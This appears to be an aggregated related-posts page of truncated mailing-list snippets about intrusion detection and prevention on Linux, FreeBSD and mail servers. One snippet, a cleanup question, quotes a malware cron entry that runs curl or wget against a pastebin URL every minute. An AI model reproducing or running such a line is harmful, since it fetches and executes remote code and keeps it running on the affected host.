similar to: new intrusion detection system

Hello to all, I have implemented a new type of intrusion detection system for my Master thesis. I would like to announce this information, in case anyone would be interested in this research. The IDS system is designed as a kernel module for FreeBSD 5.2. It is inspired by the SpamAssassin program, which detects spam by applying a set of tests to every email message and counting a sum of

Hello all, I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to setup, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately). Thank you, Dan Burkland ?

Can anyone recommend an opensource package (preferably something centos 4X compatible) that can be used on a (iptables) firewall to block virus/trojan, etc? And maybe something for intrusion detection? Thanks! Dnk

Dear all, what are the key strategies for intrusion prevention and detection with dovecot, apart from installing fail2ban? It is a pity that the IMAP protocol does not support 2 factor authentication, which seems to stop 90% of intrusion attempts in their tracks. Without it, if someone has obtained your password and reads your mail without modifying it, you will hardly ever notice. Is there a

Hi, I wrote a mail a few days ago concerning my setup with a front/back firewall, shorewall being front and ISA server 2004 acting as back firewall. I said that ISA server is logging some "intrusion attempts" namely requests coming from external interface to the internal network. As this shouldn''t happen (all intrusion attempts should be stopped by shorewall) I begun to

<div dir='auto'>Usually I use pfsense as main firewall with snort blocking all kind of scans and others.<div dir="auto"><br></div><div dir="auto">Fail2ban triggering after 3 unsuccessful tries and for last iptables if Linux or ipfw If Freebsd</div><div dir="auto"><br></div><div

Hi All, I am running iptables on centos 4.5 and 5 boxes. Now , I have requirements to enable below features. Gateway level antivirus, anti spyware and intrusion preventions, content filtering, etc. I googled a bit. But, Still no luck to find proper Docs to enable these. Can Iptables meet these features? If possible, Pls let me know some documentations that say How to set up these. Hope to

Situation: We are providing hosting services. I've grown tired of the various kiddie scripts/dictionary attacks on various services. The latest has been against vsftpd, on systems that I can't easily control vs. putting strict limits on ssh. We simply have too many users entering from too many networks many with dynamic IP addresses. Enter.... thinking about LIDS or Log Based

Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget

I run OS X 10.3.7 on a PowerMac MDD G4 on a cable broadband connection. I have reason to think my system has been tampered with. Security features in Mac OS X have been left unlocked (Preference Pane - Users) even though a master lock has always been set in the Security Preference Pane. This locks all other important preference panes which could be tampered with. Also permissions have been

On 2020-04-22 5:29 a.m., Johannes Rohr wrote: > Dear all, > > what are the key strategies for intrusion prevention and detection with > dovecot, apart from installing fail2ban? > It is a pity that the IMAP protocol does not support 2 factor > authentication, which seems to stop 90% of intrusion attempts in their > tracks. Without it, if someone has obtained your password and

We just had a security application vendor come in. We asked about Linux support and he said that putting a security application on top of an insecure OS was useless. When I asked what he meant by insecure he replied that Linux does not have a true Auditing capability - as opposed to HP-UX & Solaris which they do support. Can anyone explain to me what he was talking about? Thanks, Marty

I'm looking for some beta testers to provide feedback on an Asterisk intrusion detection & prevention program we're releasing soon. As a quick overview, the program provides: - banning based on geographic location of source IP (Continent, country, region, city, etc) - detection and banning based on channels in use by a user - detection and banning based on rate of dialing - detection

On 2020-04-22 18:45, Sami Ketola wrote: > Actually by far the biggest source of stolen credentials is > viruses/trojans harvesting them. i tryed blacklist all ips that got passwords errors, but that ends in big shorewall blrules so i turn it over to just add whitelist into blrules where ips is known custommers that dont abuse server, that way my shorewall got alot smaller config files

<!doctype html> <html> <head> <meta charset="UTF-8"> </head> <body> <div> <br> </div> <blockquote type="cite"> <div> On 22/04/2020 19:56 Benny Pedersen < <a href="mailto:me@junc.eu">me@junc.eu</a>> wrote: </div> <div> <br>

> On 22. Apr 2020, at 19.14, Michael Peddemors <michael at linuxmagic.com> wrote: > The three most common attack vectors, (and attack volumes have never been higher) are: > > * Sniffed unencrypted credentials > (Assume every home wifi router and CPE equipment are compromised ;) > * Re-used passwords where data is exposed from another site's breach > (Users WANT to

<div dir='auto'>Iptables or ipfw you always can create tables / chains and feed those with desirable IP's to ban.<div dir="auto"><br></div><div dir="auto">Something like fail2ban does. Make a big list, remove one or other IP.</div><div dir="auto"><br></div><div dir="auto">On my setup, I

Hi everyone! I would like to create a tool which would "simulate" several loop transformations. It should serve as a part of my bachelor thesis. Typical usage of that tool would be this: Mark a loop in a source (probably C/C++) file and specify desired transformation in a predefined way (for example a special comment or something). -> Run the tool on that "crafted"

I have noticed since commencing posts on this newsgroup, that there has been a significant increase in attempted intrusions, especially port 80. It's a pity that IP addresses are in the NG headers. :) Oygle

Tripwire is probably one of must-have utilities for many system administrators. However, it is missing from almost all recent Red Hattish distributions. IMO, probably due to the fact that source compiles only on i386, and needs patches to compile almost every time new major version of gcc is released. However, in absence of good replacement, this is all we have. (IMO, other tools such as AIDE